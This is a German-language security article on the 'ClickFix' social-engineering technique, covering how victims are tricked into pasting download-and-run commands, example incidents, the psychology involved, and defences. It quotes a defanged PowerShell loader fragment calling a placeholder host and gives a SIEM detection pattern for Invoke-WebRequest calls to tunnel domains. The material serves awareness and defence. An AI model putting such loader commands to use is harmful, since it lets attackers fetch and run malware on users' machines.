Seit Frühjahr 2025 taucht in Incident-Response-Berichten weltweit ein bis dato kaum beachtetes Schlagwort auf: ClickFix. Dahinter verbirgt sich eine Social-Engineering-Taktik, bei der Cyberkriminelle ihre Opfer dazu bringen, den eigentlichen Schadcode selbst auszuführen. Klassische Filtermechanismen – Signaturen, Sandboxes, Link-Scanner – greifen dabei kaum noch, weil weder Dateianhänge noch auffällige URLs notwendig sind. Laut einer aktuellen Auswertung des MDR-Anbieters ReliaQuest entfielen zwischen März und Mai 2025 bereits 23 % aller beobachteten Phishing-Taktiken auf ClickFix-Varianten 3.
Dieser Beitrag beleuchtet die Methode im Detail, zeichnet reale Fallbeispiele nach, erklärt die technischen Hintergründe und zeigt, wie Unternehmen und Privatpersonen sich wappnen können.
Evolution von Social Engineering zu ClickFix
Phishing war lange Zeit an leicht erkennbare Merkmale gebunden: Schreibfehler, dubiose Anhänge, falsche Login-Seiten. Mit steigender Awareness sank die Erfolgsquote – also mussten Angreifer kreativer werden.
ClickFix setzt genau dort an. Anstatt Nutzer zum Klick auf einen Mail-Anhang zu verleiten, externalisieren die Kriminellen die letzten Schritte des Angriffs auf die Zielperson:
- Der Angreifer präsentiert auf einer Webseite, in einer Mail oder in einem Chat eine plausible Fehlermeldung („Ihr Zertifikat ist abgelaufen“, „Ihre Sitzung wurde eingefroren“).
- Er liefert eine step-by-step-Anleitung samt Code-Snippet (PowerShell, Bash, AppleScript), das angeblich das Problem behebt.
- Das Opfer kopiert den aussehbar harmlosen Befehl – oft einzeilig, geschickt gekürzt – in die Konsole oder den Ausführen-Dialog.
- Der Befehl lädt im Hintergrund eine verschlüsselte Payload aus einer legitimen Cloud-Quelle (GitHub, Pastebin, Cloudflare Tunnel) und startet die Malware im Arbeitsspeicher.
Damit ist der Nutzer zum willigen Komplizen geworden: Die Ausführung geschieht im Kontext seines Benutzerkontos, Signaturen werden umgangen, Telemetriedaten weisen auf „legitime“ Nutzeraktivität hin.
Technische Anatomy – zerlegt in vier Phasen
| Phase | Ziel | Typisches Artefakt |
|---|---|---|
| 1. Köder | Glaubwürdigkeit herstellen | Captcha-Popup, Support-Mail, Teams-Chat, LinkedIn-Nachricht |
| 2. Anleitung | Social Engineering | „Copy & paste this command“, GIF-Demonstration, PDF-Handbuch |
| 3. Initial Loader | minimaler Schadcode | Ein-Zeiler (`iwr hxxp://cf[.]link -UseBasicParsing |
| 4. Payload | Vollwertige Malware | AsyncRAT, Lumma Stealer, XWorm – gestartet in-memory |
Ein zentrales Element ist die Hosting-Infrastruktur: 2025 missbrauchen Angreifer zunehmend Cloudflare Tunnels (*.trycloudflare.com), weil sie damit binnen Sekunden TLS-geschützte Subdomains erhalten – ohne Registrierung, ohne Kosten 3. Verbindet sich die PowerShell des Opfers dorthin, erscheint das im Proxy-Log wie ein normaler HTTPS-Aufruf zu einer renommierten Domain.
Reale Vorfälle 2025
- Finance-Helpdesk-Kampagne (April 2025, DACH-Raum)
• Betreff: „Dringend: Zahlungsabgleich fehlgeschlagen – Schritt zur Behebung“
• Inhalt: GIF zeigt, wie man in WindowsWin + R → powershell → pasteausführt.
• Schaden: Zwei mittelständische Unternehmen meldeten Ransomware-Folgeschäden > 150 000 €. - Universitäts-IT-Phish (Mai 2025, USA & Kanada)
• Täuschung: Aufforderung zum „SSL-Fix“ für Eduroam-Zertifikate.
• Befehl: Bash-Oneliner lädt ein Python-Script mit Studentendaten-Stealer.
• Folge: 12 000 kompromittierte Accounts; Passwort-Reset-Marathon. - „Captcha-Bypass“-Masche in E-Commerce (Juni 2025, global)
• Nutzer sehen ein Pop-up, das vorgibt, ein blockiertes Captcha zu reparieren.
• Erfolgsquote laut ReliaQuest-Telemetrie: > 40 % der Besucher führten den Code aus.
Psychologie hinter dem Erfolg
- Autorität & Dringlichkeit
Das Pop-up imitiert bekannte System-Dialoge („Windows-Sicherheit“, „Apple Gatekeeper“) – gepaart mit Countdown-Timers, die Angst schüren. - Kompetenzgefühl
Der Befehl wirkt wie ein „Pro-Tipp“. Opfer fühlen sich technisch versiert, wenn sie eine Shell öffnen – Ironie: Genau das nutzen Kriminelle aus. - Kurz & klar
Ein Einzeiler macht weniger misstrauisch als ein verschleierter Macro-Code. Viele Befehle nutzen legitime Tools wieInvoke-WebRequest,curl,python -m.
Abwehr: Warum traditionelle Filter versagen
| Verteidigungsmaßnahme | Warum sie scheitert |
|---|---|
| E-Mail-Sandbox | Keine Datei, häufig nicht einmal ein Link → Sandbox sieht nur Text |
| URL-Filter | Downloader zielt auf trycloudflare.com oder raw.githubusercontent.com – schwer blockierbar |
| AV-Signaturen | Loader ist obfuskiert, Payload liegt verschlüsselt in der Cloud |
| MFA | Angreifer stiehlt Cookies/Tokens, nicht Passwörter; bestehende Sitzungen bleiben gültig |
Kurzum: ClickFix umgeht per Design alles, was auf Erkennung von „bösem Objekt“ basiert.
Meer an Gegenmaßnahmen – was wirklich hilft
Technische Kontrollen
- Application Control / Script Blocking
• Signiert nur erlaubte PowerShell-/Bash-Commands.
•Set-ExecutionPolicy AllSigned+ Constrained Language Mode in Windows. - Command-Line-Logging & Live-Alerting
• SIEM-Rule:Process == powershell && Command matches "(Invoke-WebRequest|iwr).*trycloudflare"
• Für Linux: Auditd-Regeln aufcurl|wget+ Base64-Pipes. - TLS-Inspection & Cloud-Reputation
• SASE-Gateways mit Inline-Inspection entschlüsseln Traffic zu Cloudflare-Subdomains.
• Anomalie-Scoring: Neuer Host, erstmals aufgerufen → Alarm. - FIDO2-Tokens & Session-Hardening
• Tokens reduzieren Post-Compromise-Abgriff.
• Refresh-Token-Lifetimes verkürzen, OAuth-Scopes einschränken.
Menschliche Firewall 2.0
- Micro-Trainings zu Shell-Befehlen
• 5-Min-Lessons: „Warum Sie nie Code aus Mails kopieren“.
• Gamification: Quiz „Echter Admin-Fix oder ClickFix?“. - Visuelle Warnhinweise
• Browser-Plugins, die Clipboard-Copy aus verdächtigen Domains markieren.
• Pop-ups: „Sie fügen gerade einen Befehl mit Invoke-WebRequest ein – sicher?“. - Red-Team-Simulationen
• Phish-Simulation mit echten ClickFix-Onelinern (ungefährlich).
• Metrik: Time-to-Report statt nur Click-Rate.
Regulatorischer Kontext
• EU-NIS2 stuft „Social-Engineering-Induced Malware“ explizit als meldepflichtigen Vorfall ein.
• US-SEC Cyber-Disclosure Rules (Juni 2025) erfordern 4-Tage-Meldepflicht; ClickFix-Attacken zählen.
• Versicherer passen Cyber-Policen an: Höhere Selbstbehalte, wenn keine Script-Block-Policies existieren.
Zukunftsausblick
Experten gehen davon aus, dass ClickFix nur der Anfang ist. Bereits in Foren beobachtet:
• „Double-ClickFix“: Nutzer führen erst harmlosen Shell-Befehl aus, der dann ein böses Browser-Extension-Manifest „repariert“ – zusätzliche Persistenz.
• LLM-Assisted Fixes: Deepfake-Chatbots, die per Live-Support vorgaukeln, bei Problemen zu helfen.
• Mobile-ClickFix: Android-Termux-Befehle in SMS („Tippe das ins Termux, um dein VPN zu reparieren“).
Zehn-Punkte-Sofortplan für Unternehmen
- Legacy-PowerShell < v5.1 abschalten.
- MacOS & Linux:
curl|wgetdefault → blocked ohne Hash-Allowlist. - Cloudflare-Subdomains in Proxy-EOP mit „New Domain“ Risk-Scoring verknüpfen.
- Dev-Teams: Secrets-Scanning (um gestohlene Tokens schnell zu invalidieren).
- DMARC, DKIM, SPF → „reject“ – verhindert zumindest Spoofing-Mails.
- Awareness-Kampagne „Copy ≠ Confidence“.
- Incident-Runbook „User executed script“ – inklusive sofortigem Token-Purge.
- Red-Team-Attack-Simulation quartalsweise.
- Executive-Briefings: Schaden-Cases + Bußgeld-Risiken vorstellen.
- Budget sichern: Endpoint-Detection mit Kommandozeilen-Live-Telemetry.
ClickFix ist kein reines Technik-, sondern ein Psychologie-Problem. Solange Nutzer auf Anweisungen vertrauen, die sie nicht vollständig verstehen, bleibt die Masche profitabel. Unternehmen müssen deshalb Technologie, Prozesse und menschliches Verhalten gleichermaßen adressieren. Wer heute Execution-Policies, Echtzeit-Monitoring und moderne Awareness kombiniert, nimmt ClickFix den größten Trumpf: den unbedarften Klick.
Bleiben Sie skeptisch – besonders, wenn jemand möchte, dass Sie „nur schnell diesen Befehl“ eingeben.
